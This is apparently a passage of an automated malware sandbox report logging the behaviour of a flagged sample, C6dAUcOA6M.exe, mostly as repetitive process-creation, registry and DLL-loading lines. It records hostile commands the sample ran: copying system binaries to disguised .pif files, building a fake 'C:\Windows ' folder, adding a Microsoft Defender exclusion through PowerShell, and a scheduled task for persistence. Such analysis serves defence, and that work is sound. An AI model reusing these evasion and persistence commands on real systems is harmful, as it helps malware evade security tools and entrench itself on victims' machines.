                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C6dAUcOA6M.exeReversingLabs: Detection: 63%
                    Source: C6dAUcOA6M.exeVirustotal: Detection: 62%
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeFile read: C:\Users\user\Desktop\C6dAUcOA6M.exeJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-383
                    Source: unknownProcess created: C:\Users\user\Desktop\C6dAUcOA6M.exe "C:\Users\user\Desktop\C6dAUcOA6M.exe"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                    Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                    Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "Jump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /oJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ???????.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection loaded: ??.dllJump to behavior
